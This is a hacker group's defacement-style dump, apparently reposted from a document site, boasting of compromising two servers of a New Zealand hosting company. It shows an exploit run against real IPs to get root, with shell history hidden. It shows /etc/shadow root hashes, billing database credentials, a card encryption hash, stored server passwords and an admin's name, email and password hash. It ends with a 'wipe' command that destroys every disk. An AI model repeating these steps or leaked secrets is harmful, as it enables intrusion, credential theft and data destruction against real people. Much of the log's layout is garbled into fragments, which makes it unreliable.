Ssanz Pwned

__ .
__
_____
_____/ |_|__|
______ ____ ____
\__ \ /
\ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__|
/____ >\___ >\___ >
\/
\/
\/
\/
\/
Some of you have seen a lot of casualtie
s lately in the webhosting scene:
hosting companies being wiped and rm'd a
t the expense of their clients. While
some of this is collateral damage, we're
about to show you, ladies and
gentlemen, that sometimes you aren't pwn
ed because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.co
m/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/show

thread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>>
* Scan for Shells/malicious scripts
>>
* Scan for vulnerable web content ( permissions, RFI's )
>>
* Scans for Vulnerable Server Services
>>
* Vulnerable Ports
>>
* Testing of TCP handling - dDOS test.
>>
* Scan for Vulnerable PHP scripts/mods.
>>
* Control Panel Security Audit ( external )
>>
* Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>>
* Permissions/Ownership(s) Review
>>
* Apache/Webserver Security
>>
* User Account Security & binaries access audit
>>
* Local RFI Exploits located/patched.
>>
* System Binary Security Audit
>>
* Firewall/IPTABLES Audit
>>
* Bruteforce detection test & audit
>>
* Root Access Authentication Audit
>>
* Local PHP Functions Audit
>>
* Control Panel Security Audit ( Internal )
>>
* Kernel Security Audit
>>
* Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_m
ono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug
25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
USER
TTY
FROM
LOGIN@ IDLE JCPU PCPU WHAT
root
pts/0
125.238.144.224 20:17
7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls
total 3008
drwxr-x--drwxr-xr-x
-rw-------rw-------rw-------rw-r--r--rw-r--r--rw-r--r-drwxrwxrwx
-rw-r--r-drwxr-xr-x
-rw-r--r-drwxr-xr-x
-rw-r--r-drwxr-xr-x
drwxr-xr-x
drwx-----drwxr-xr-x
-rw-r--r--rw-r--r-drwx------rw-r--r--rw-r--r-drwx-----drwx-----drwxr-xr-x
drwx-----drwxrwxrwx
-rw-r--r--rw-r--r--rw-r--r--rw-r--r-drwxr-xr-x
-la
24
27
1
1
1
1
1
1
3
1
3
1
3
1
4
4
3
10
1
1
2
1
1
3
2
4
2
5
1
1
1
1
6
root
root
root
root
root
root
root
root
therockm
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
theweath
root
root
root
root
500
root
root
root
root
root
root
root
root
therockm
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
theweath
root
root
root
root
root
4096
4096
957
1012
15460
24
191
176
4096
141564
4096
18656
4096
14507
4096
4096
4096
4096
430121
100
4096
1176672
16
4096
4096
4096
4096
4096
414870
561
8144
4246
4096
Jul
Jun
Jun
Jun
Jul
Jan
Jan
Jan
Jun
Mar
Nov
Feb
Nov
Oct
Jun
Jun
Jun
Apr
May
Jan
Jun
Jul
Jun
Jun
Jun
Jun
Jun
Jun
Sep
Jun
Jun
Jun
Sep
4
27
13
1
3
6
6
6
5
1
15
28
5
10
1
1
1
13
15
6
1
4
3
1
1
10
1
1
23
27
6
1
13
03:43
02:49
07:24
10:39
23:38
2007
2007
2007
07:26
2007
2006
11:32
2006
2008
14:33
17:10
13:50
16:17
12:07
2007
13:54
03:40
08:34
10:39
10:39
23:42
13:55
17:13
2008
02:48
19:23
10:39
2005
.
..
.accesshash
anaconda-ks.cfg
.bash_history
.bash_logout
.bash_profile
.bashrc
bwm-ng-0.6
bwm-ng-0.6.tar.gz
cmm
cmm.tgz
cmq
cmq.tgz
.cpanel
cpanel3-skel
.cpobjcache
csf
csf.tgz
.cshrc
.elinks
error_log
.forward
.gconf
.gconfd
.gem
.gnupg
htop-0.8.1
htop-0.8.1.tar.gz
.htoprc
index.html
install.log.syslog
iptraf-3.0.0
-rw-r--r--rw-r--r--rw-r--r--rw-r--r-drwx------rw-------rw-------rwxrwxrwx
-rw-r--r-drwxr-xr-x
drwxr-xr-x
-rw------drwx-----drwx------rw-r--r-drwxr-xr-x
-rw------drw------drw-------
1
1
1
1
6
1
1
1
1
2
3
1
3
2
1
3
1
2
3
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
0
0
0
575169
4096
61
139
38688
264
4096
4096
1024
4096
4096
129
4096
0
4096
4096
Jun
Jun
Jun
Jun
Jun
Jun
Jul
Dec
Jul
Jun
Jun
Jun
Jun
Jun
Jan
Jun
Jun
Jun
Jun
27
27
27
27
1
12
3
1
2
1
1
7
1
2
6
7
7
3
10
09:21
09:22
09:24
09:26
14:21
21:04
10:51
2008
21:43
17:04
17:04
19:50
14:29
06:41
2007
21:54
22:01
08:18
08:25
iptraf-3.0.0.tar.gz
iptraf-3.0.0.tar.gz.1
.MirrorSearch
.my.cnf
.mysql_history
mysqltuner.pl
.pearrc
public_ftp
public_html
.rnd
.spamassassin
.ssh
.tcshrc
tmp
.trustwavereqs
whmrbackups
whmrcorebackups
sh-3.2# cat .bash_history

htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
service httpd restart
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c
| sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c
| sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP

/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-i
so
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.
00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog
Username
root
simmobim
mattss
etasmtco
| grep -v Never
Port
From
pts/1
125.238.144.224
pts/0
118.69.80.114
pts/1
118.90.48.0
pts/0
189.31.24.129
Latest
Fri Jul
Fri Jun
Sun Jun
Sat Jun
3
12
21
20
20:27:03
00:22:04
04:44:58
10:14:51
-0400
-0400
-0400
-0400
2009
2009
2009
2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing
drwx--x--x 737 root
lrwxrwxrwx 1 billing
pache/domlogs/billing
-rw------- 1 billing
illing.tar.gz
illing.tar.gz
lling.tar.gz
-rw-r--r-- 1 billing
drwxr-xr-x 5 billing
-rw-r----- 1 billing
drwxr-x--- 4 billing
drwxrwx--- 10 billing
drwx------ 4 billing
drwx------ 2 billing
lrwxrwxrwx 1 billing
billing
root
billing
4096 Jun 28 02:08 .

20480 Jul 4 00:37 ..
33 Jun 2 01:58 access-logs -> /usr/local/a
billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_b

billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_b
billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_bi
billing 42341015 May 31 21:42 backup-billing9912.tar.gz
billing
24 May 27 2008 .bash_logout
billing
176 May 27 2008 .bash_profile
billing
124 May 27 2008 .bashrc
billing
17 May 27 2008 .contactemail
billing
4096 May 8 02:48 .cpanel
billing
0 Apr 4 06:32 cpbackup-exclude.conf
billing
4096 Jun 2 01:57 cpmove.psql
billing
4096 Nov 12 2008 cpmove.psql.1240007789
billing
4096 Apr 16 23:24 cpmove.psql.1243922290
billing 532304 Jul 4 03:45 error_log
mail
4096 Jan 19 21:39 etc
nobody
4096 May 27 2008 .htpasswds
billing
7 Nov 12 2008 .lang
billing
15 Jun 28 02:07 .lastlogin
billing
4096 Jul 2 21:43 mail
billing
4096 Nov 12 2008 .mozilla
billing
4096 Apr 29 2008 public_ftp
nobody
4096 Jun 28 02:55 public_html
billing
4096 Jun 7 21:53 ssl
billing
4096 Feb 25 17:59 tmp
billing
4096 May 27 2008 .trash
billing
11 Jun 2 01:58 www -> public_html
billing
658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin
init.php
banned.php
logout.php
viewticket.php whois.php
affiliates.php
billing
installmingchowping modules
_vti_bin
aff.php
cart.php
knowledgebase.php
networkissues.php
_vti_cnf
announcements.php
cgi-bin
lang
networkissuesrss.php
_vti_inf.html
announcementsrss.php clientarea.php
libs
order.php
_vti_log
announcements.xml
configuration.php
link.php
passwordreminder.php
configuressl.php domainchecker.php
postinfo.html
templates
contact.php
_private
downloads
templates_c
creditcard.php
register.php
downloads.php
tutorials.php
dbconnect.php
htaccess.txt
serverstatus.php
upgrade
display.php
status
images
upgrade.php
dl.php
includes
submitticket.php
viewemail.php
_vti_pvt
attachments
login.php
_vti_txt
configuration.php.new dologin.php
index.php
pipe
supporttickets.php viewinvoice.php
sh-3.2# cat configuration.php

<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbz
LLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing |
+----------------------------+
| mod_ipmanager
|
| mod_ipmonitor
|
| tblaccounts
|
| tblactivitylog
|
| tbladdons
|
| tbladminlog
|
| tbladminperms
|
| tbladminroles
|
| tbladmins
|
| tbladminsecurityquestions |
| tblaffiliates
|
| tblaffiliatesaccounts
|
| tblaffiliateshistory
|
| tblaffiliatespending
|
| tblaffiliateswithdrawals |
| tblannouncements
|
| tblbannedemails
|
| tblbannedips
|
| tblbillableitems
|
| tblbrowserlinks
|
| tblcalendar
|
| tblcancelrequests
|
| tblclientgroups
|
| tblclients
|
| tblconfiguration
|
| tblcontacts
|
| tblcredit
|
| tblcurrencies
|
| tblcustomfields
|
| tblcustomfieldsvalues
|
| tbldomainpricing
|
| tbldomains
|
| tbldomainsadditionalfields |
| tbldownloadcats
|
| tbldownloads
|
| tblemails
|
| tblemailtemplates
|
| tblfraud
|
| tblgatewaylog
|
| tblhosting
|
| tblhostingaddons
|
| tblhostingconfigoptions
|
| tblinvoiceitems
|
| tblinvoices
|
| tblknowledgebase
|
| tblknowledgebasecats
|
| tblknowledgebaselinks
|
| tbllinks
|
| tblnetworkissues
|
| tblnotes
|
| tblorders
|
| tblpaymentgateways
|
| tblpricing
|
| tblproductconfiggroups
|
| tblproductconfiglinks
|
| tblproductconfigoptions
|
| tblproductconfigoptionssub |
| tblproductgroups
|
| tblproducts
|
| tblpromotions
|
| tblquoteitems
|
| tblquotes
|
| tblregistrars
|
| tblservers
|
| tblsslorders
|
| tbltax
|
| tblticketbreaklines
|
| tblticketdepartments
|
| tblticketescalations
|
| tblticketlog
|
| tblticketmaillog
|
| tblticketnotes
|
| tblticketpredefinedcats
|
| tblticketpredefinedreplies |
| tblticketreplies
|
| tbltickets
|
| tblticketspamfilters
|
| tbltodolist
|
| tblupgrades
|
| tblwhoislog
|
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+-----------------
---------------------------------------------------------+
| name
| ipaddress
| hostname
| username | password
|
+--------------+----------------+------------------+----------+-------------------------------------------------------------------------+
| Osiris
| 66.197.143.133 | Osiris.ssanz.net | ssanz
| J4WILwNJpxR0Khyu
PspLOT37zLzLrZ1wyqctabXg3co=
|
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root
| +V876e3z7tGn9HXE
cOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil
| 66.197.204.101 | devil.ssanz.net | root
| n/a/WSvQJp/++la5
CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
|
+--------------+----------------+------------------+----------+-------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+---------------------------------+
| firstname | lastname | email
| username | password
|
+-----------+----------+-----------------+----------+---------------------------------+
| Logan
| Douglas | Logan@ssanz.net | Admin
| c6df529826cf16ac5bedb424d8
ac972b |
+-----------+----------+-----------------+----------+---------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem
/dev/sda5
/dev/sda8
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda6
tmpfs
/dev/sdb1
Size
2.0G
875G
9.7G
9.7G
99M
996M
3.9G
459G
Used
477M
147G
6.8G
7.0G
23M
64M
0
163G
Avail
1.4G
684G
2.5G
2.3G
72M
881M
3.9G
273G
Use%
26%
18%
74%
76%
24%
7%
0%
38%
Mounted on
/
/home
/usr
/var
/boot
/tmp
/dev/shm
/backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda5
/dev/sda8
/dev/sda3
/dev/sda2
/dev/sda1
/dev/sda6
tmpfs
/dev/sdb1
sh-3.2# exit
exit
Size Used Avail Use% Mounted on

64Z 64Z 1.5G 100% /
64Z 64Z 729G 100% /home
64Z 64Z 3.0G 100% /usr
64Z 64Z 3.0G 100% /var
16Z 16Z
0 100% /boot
64Z 64Z 933M 100% /tmp
3.9G
0 3.9G 0% /dev/shm
64Z 64Z 296G 100% /backup
----------------------------------osiris
devil
[ DOWN ]
[ UP ]
----------------------------------anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug
25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER
TTY
FROM
LOGIN@ IDLE JCPU PCPU WHAT
root
pts/0
125.238.144.224 20:18
7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls
total 1232
drwxr-x--drwxr-xr-x
-rw-------rw-------rw-------rw-r--r--rw-r--r--rw-r--r-drwxrwxrwx
-rw-r--r-drwxr-xr-x
-rw-r--r-drwxr-xr-x
drwxr-xr-x
drwx-----drwxr-xr-x
-rw-r--r-drwxr-xr-x
-rw-r--r--rw-r--r-drwx------rw-r--r--
-la
23
25
1
1
1
1
1
1
3
1
3
1
4
4
3
2
1
10
1
1
2
1
root
root
root
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
root
root
root
4096
4096
957
937
7258
24
191
176
4096
141564
4096
14507
4096
4096
4096
4096
12207
4096
431490
100
4096
16
Jul
Jun
Jun
Jun
Jun
Jan
Jan
Jan
Jun
Mar
Nov
Oct
Jun
Jun
Jun
Aug
Oct
Jun
Jun
Jan
Jun
Jun
4
29
13
12
30
6
6
6
12
1
5
10
12
12
12
21
10
5
5
6
12
13
04:06
14:33
05:20
00:01
10:03
2007
2007
2007
04:45
2007
2006
2008
02:51
03:26
00:17
2006
2008
05:05
10:52
2007
01:51
15:33
.
..
.accesshash
anaconda-ks.cfg
.bash_history
.bash_logout
.bash_profile
.bashrc
bwm-ng-0.6
bwm-ng-0.6.tar.gz
cmq
cmq.tgz
.cpanel
cpanel3-skel
.cpobjcache
cse
cse.tgz
csf
csf.tgz
.cshrc
.elinks
.forward
drwx-----drwx-----drwxr-xr-x
drwx-----drwxrwxrwx
-rw-r--r--rw-r--r--rw-r--r-drwx------rw------drwxr-xr-x
-rw-r--r--rw-r--r-drwxr-xr-x
drwxr-xr-x
-rw------drwx-----drwx------rw-r--r-drwxr-xr-x
drwxr-xr-x
3
2
4
2
6
1
1
1
6
1
3
1
1
2
3
1
3
2
1
3
2
root
root
root
root
1002
root
root
root
root
root
1000
root
root
root
root
root
root
root
root
root
root
root 4096 Jun 11 23:59 .gconf

root 4096 Jun 11 23:59 .gconfd
root 4096 Jun 12 04:29 .gem
root 4096 Jun 12 01:53 .gnupg
1002 4096 Jun 12 04:24 htop-0.8.1
root 414870 Sep 23 2008 htop-0.8.1.tar.gz
root
561 Jun 12 23:31 .htoprc
root 4239 Jun 12 00:01 install.log.syslog
root 4096 Jun 12 02:33 .MirrorSearch
root
37 Jun 12 02:11 .my.cnf
1000 4096 Jun 12 05:42 mytop-1.6
root 19720 Feb 16 2007 mytop-1.6.tar.gz
root
264 Jun 23 00:23 .pearrc
root 4096 Jun 12 03:21 public_ftp
root 4096 Jun 12 03:21 public_html
root 1024 Jun 12 02:50 .rnd
root 4096 Jun 12 02:41 .spamassassin
root 4096 Jun 22 09:11 .ssh
root
129 Jan 6 2007 .tcshrc
root 4096 Jun 12 02:40 tmp
root 4096 Jun 16 19:23 .wapi
sh-3.2# cat .bash_history

sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort
| sort -n
csf -d 89.165.50.38
| sort -n
csf -d 89.165.50.38
| sort -n
csf -d 89.165.50.38
| sort -n
| uniq -c
| uniq -c
| uniq -c
| uniq -c
csf -d 89.165.50.38
| sort -n
csf -d 89.165.50.38
| sort -n
csf -d 89.165.50.38
| sort -n
csf -d 89.165.50.38
| sort -n
| sort -n
csf -d 89.38.206.233
csf --restart
| sort -n
| sort -n
csf -d 118.94.59.33
| sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/
i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK

31G 7.5G 22G 26% /
452G 35G 394G 9% /home
99M 23M 72M 24% /boot
495M 4.0K 495M 1% /dev/shm
485M 14M 446M 3% /tmp
sh-3.2# who
root
pts/0
2009-07-03 20:18 (125.238.144.224)
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem
/dev/sda3
/dev/sdb1
/dev/sda1
tmpfs
/usr/tmpDSK

64Z 64Z 24G 100% /
64Z 64Z 417G 100% /home
16Z 16Z 77M 100% /boot
495M 4.0K 495M 1% /dev/shm
485M 14M 446M 3% /tmp
sh-3.2# exit
exit
----------------------------------osiris
devil
[ DOWN ]
[ DOWN ]
----------------------------------Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?
~ There will always be no way out.

Ssanz Pwned

Diunggah oleh

Informasi Dokumen

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

Ssanz Pwned

Diunggah oleh

Hak Cipta:

Format Tersedia

__ .

Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/show

[+] SSH Port: 22

sh-3.2# cat .bash_history

/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP

4096 Jun 28 02:08 .

billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_b

sh-3.2# cat configuration.php

Size Used Avail Use% Mounted on

----------------------------------anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

root 4096 Jun 11 23:59 .gconf

sh-3.2# cat .bash_history

Size Used Avail Use% Mounted on

2009-07-03 20:18 (125.238.144.224)

Size Used Avail Use% Mounted on

Anda mungkin juga menyukai